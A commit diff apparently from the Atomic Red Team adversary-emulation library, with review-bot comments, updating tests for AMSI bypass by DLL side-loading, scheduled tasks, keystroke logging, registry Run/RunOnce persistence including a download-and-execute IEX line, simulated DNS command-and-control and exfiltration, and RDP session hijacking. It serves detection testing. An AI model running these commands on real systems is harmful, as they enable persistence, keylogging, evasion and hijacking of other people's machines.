Improve tests (#715)

* continue work

* remove duplicate test, this is also in 1023

* update more tests

* cleaning pass
Andrew Beers
2019-12-10 07:51:01 -06:00
committed by Carrie Roberts
parent 7eca6e24e4
commit 48ef8edee0
8 changed files with 80 additions and 110 deletions
+5 -4
@@ -8,14 +8,15 @@ atomic_tests:
Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version
of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
elevation_required: true
command: |
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
cmd.exe /k %APPDATA%\updater.exe
%APPDATA%\updater.exe -Command exit
cleanup_command: |
del %APPDATA%\updater.exe
del %APPDATA%\amsi.dll
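Review bot: The description at the top of the hunk still says the test loads a vulnerable version of amsi.dll, but the command copies the current `%windir%\System32\amsi.dll` next to the renamed powershell.exe, so what is exercised is the side-by-side DLL load from the application directory rather than a downgraded library; I'd reword it to `Adversaries can take advantage of insecure library loading by PowerShell to load a copy of amsi.dll placed beside a renamed powershell.exe in order to bypass AMSI (Anti-Malware Scanning Interface)`. The switch to `elevation_required: true` is not explained by the visible commands (a read from System32 and writes under %APPDATA%); if it is intentional, a short comment on the executor stating the reason would save the next reader the same question. The test definition begins above this hunk.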
+10 -11
@@ -7,21 +7,18 @@ atomic_tests:
description: |
Executes cmd.exe
Note: deprecated in Windows 8+
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
at 13:20 /interactive cmd
- name: Scheduled task Local
description: |
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
@@ -31,19 +28,19 @@ atomic_tests:
description: What time 24 Hour
type: String
default: 20:10
executor:
name: command_prompt
elevation_required: false
elevation_required: true
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
cleanup_command: |
SCHTASKS /Delete /TN spawn /F
- name: Scheduled task Remote
description: |
Create a task on a remote system
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
@@ -67,16 +64,18 @@ atomic_tests:
default: At0micStrong
executor:
name: command_prompt
elevation_required: true
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
cleanup_command: |
SCHTASKS /Delete /TN "Atomic task" /F
- name: Powershell Cmdlet Scheduled Task
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
These could be concidered "fileless" scheduled task creation.
Create an atomic scheduled task that leverages native powershell cmdlets.
These could be considered "fileless" scheduled task creation.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
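Review bot: `default: 20:10` in the second hunk (the `time` argument of Scheduled task Local) is an unquoted plain scalar, and YAML 1.1 loaders such as Ruby's Psych read `digits:digits` as a sexagesimal integer (1210), so the value substituted into `/ST` can come out as `1210` rather than `20:10`; quote it as `default: "20:10"`. In the same hunk `/TR #{task_command}` is unquoted while the Remote test below uses `/TR "#{task_command}"`, so a task command containing spaces would be split by SCHTASKS; use `/TR "#{task_command}"` in both. In the first hunk `description: |` for Scheduled task Local is immediately followed by `supported_platforms:`, which leaves that test with an empty description — I can't tell from the rendered view whether that line survives on the new side. The third hunk is a spelling fix only.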
+6 -5
@@ -8,17 +8,18 @@ atomic_tests:
Utilize PowerShell and external resource to capture keystrokes
[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1)
Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
supported_platforms:
- windows
input_arguments:
filepath:
description: Name of the local file, include path.
type: Path
default: c:\key.log
default: $env:TEMP\key.log
executor:
name: powershell
elevation_required: true
command: |
$PathToAtomicsFolder\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
Set-Location $PathToAtomicsFolder
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: |
Remove-Item $env:TEMP\key.log
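Review bot: The new `cleanup_command` hard-codes `Remove-Item $env:TEMP\key.log` while the log location is the `filepath` input argument, so a run that overrides `filepath` leaves the real keystroke log behind and the cleanup errors on a missing file; use `Remove-Item #{filepath} -ErrorAction Ignore` so cleanup follows the argument. `Set-Location $PathToAtomicsFolder` also changes the working directory of the invoking session for anything that runs afterwards, and the same pattern is introduced in both T1071 hunks of this commit; `& "$PathToAtomicsFolder\T1056\src\Get-Keystrokes.ps1" -LogPath #{filepath}` runs the script without that side effect, and the call operator with quotes keeps a folder path containing spaces working. The test definition begins above this hunk.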
+12 -38
@@ -6,77 +6,51 @@ atomic_tests:
- name: Reg Key Run
description: |
Run Key Persistence
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Thing to Run
type: Path
default: C:\Path\AtomicRedTeam.exe
executor:
name: command_prompt
command: |
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
cleanup_command: |
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
- name: Reg Key RunOnce
description: |
RunOnce Key Persistence
supported_platforms:
- windows
input_arguments:
thing_to_execute:
description: Thing to Run
type: Path
default: C:\Path\AtomicRedTeam.dll
executor:
name: command_prompt
command: |
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
cleanup_command: |
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
- name: PowerShell Registry RunOnce
description: |
RunOnce Key Persistence via PowerShell
supported_platforms:
- windows
input_arguments:
thing_to_execute:
description: Thing to Run
type: Path
default: powershell.exe
executor:
name: powershell
command: |
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
- name: Startup Folder
description: |
Add Shortcut To Startup via PowerShell
supported_platforms:
- windows
input_arguments:
thing_to_execute:
description: Thing to Run
type: Path
default: C:\Path\AtomicRedTeam.exe
executor:
name: powershell
command: |
$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
cleanup_command: |
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
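Review bot: Both RunOnce tests write under HKLM (`REG ADD HKLM\SOFTWARE\...\RunOnceEx\0001\Depend` and `$RunOnceKey = "HKLM:\Software\...\RunOnce"`) but neither executor declares `elevation_required: true`, so on a standard user account the run fails at the registry write before anything the cleanup could undo exists; the other executors touched in this commit set the flag explicitly, so add `elevation_required: true` under both `executor:` blocks. Moving `REG DELETE` and `Remove-ItemProperty` into `cleanup_command` is right, but `$RunOnceKey` is assigned only in `command`, so if the cleanup runs in its own invocation (as the separate field suggests) the variable is undefined there; the cleanup should repeat the assignment or use the literal path, `Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name "NextRun" -Force`. I can't tell from the rendered view which side the repeated `$RunOnceKey`/`set-itemproperty` pair after the Startup Folder shortcut code belongs to; if it is on the new side it duplicates the PowerShell Registry RunOnce test.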
+5 -3
@@ -111,8 +111,9 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
.\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
- name: DNS Long Domain Query
description: |
This test simulates an infected host returning data to a command and control server using long domain names.
@@ -137,4 +138,5 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
.\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
@@ -1,18 +1,18 @@
param(
[string]$Domain = "example.com",
[string]$Subdomain = "atomicredteam",
[string]$QueryType = "TXT",
[int]$C2Interval = 30,
[int]$C2Jitter = 20,
[int]$RunTime = 30
)
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$Jitter = (Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1
Start-Sleep -Seconds $C2Interval
}
param(
[string]$Domain = "example.com",
[string]$Subdomain = "atomicredteam",
[string]$QueryType = "TXT",
[int]$C2Interval = 30,
[int]$C2Jitter = 20,
[int]$RunTime = 30
)
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$Jitter = (Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1
Start-Sleep -Seconds $C2Interval
}
Until ($TimeNow -ge $RunEnd)
@@ -1,25 +1,25 @@
param(
[string]$Domain = "example.com",
[string]$Subdomain = "atomicredteamatomicredteamatomicredteamatomicredteamatomicredte",
[string]$QueryType = "TXT"
)
$Subdomain1Length = 1;
$Subdomain2Length = 1;
$Subdomain3Length = 1;
$Subdomain4Length = 1;
for($i=$Domain.Length+12; $i -le 253; $i++) {
$DomainLength = ([string]$i).PadLeft(3, "0")
$DomainToQuery = $DomainLength + "." +
$Subdomain.substring(0, $Subdomain1Length) + "." +
$Subdomain.substring(0, $Subdomain2Length) + "." +
$Subdomain.substring(0, $Subdomain3Length) + "." +
$Subdomain.substring(0, $Subdomain4Length) + "." +
$Domain
Resolve-DnsName -type $QueryType $DomainToQuery -QuickTimeout
if ($Subdomain1Length -lt 63) { $Subdomain1Length++ }
elseif ($Subdomain2Length -lt 63) { $Subdomain2Length++ }
elseif ($Subdomain3Length -lt 63) { $Subdomain3Length++ }
elseif ($Subdomain4Length -lt 63) { $Subdomain4Length++ }
param(
[string]$Domain = "example.com",
[string]$Subdomain = "atomicredteamatomicredteamatomicredteamatomicredteamatomicredte",
[string]$QueryType = "TXT"
)
$Subdomain1Length = 1;
$Subdomain2Length = 1;
$Subdomain3Length = 1;
$Subdomain4Length = 1;
for($i=$Domain.Length+12; $i -le 253; $i++) {
$DomainLength = ([string]$i).PadLeft(3, "0")
$DomainToQuery = $DomainLength + "." +
$Subdomain.substring(0, $Subdomain1Length) + "." +
$Subdomain.substring(0, $Subdomain2Length) + "." +
$Subdomain.substring(0, $Subdomain3Length) + "." +
$Subdomain.substring(0, $Subdomain4Length) + "." +
$Domain
Resolve-DnsName -type $QueryType $DomainToQuery -QuickTimeout
if ($Subdomain1Length -lt 63) { $Subdomain1Length++ }
elseif ($Subdomain2Length -lt 63) { $Subdomain2Length++ }
elseif ($Subdomain3Length -lt 63) { $Subdomain3Length++ }
elseif ($Subdomain4Length -lt 63) { $Subdomain4Length++ }
}
+1 -8
@@ -6,11 +6,8 @@ atomic_tests:
- name: RDP
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
@@ -18,27 +15,23 @@ atomic_tests:
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
cleanup_command: |
sc.exe delete sesshijack
- name: RDPto-DomainController
description: |
Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user
supported_platforms:
- windows
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
default: $ENV:logonserver.TrimStart("\")
username:
description: Username argument default %USERDOMAIN%\%username%
type: String
default: $Env:USERDOMAIN\$ENV:USERNAME
executor:
name: powershell
elevation_required: false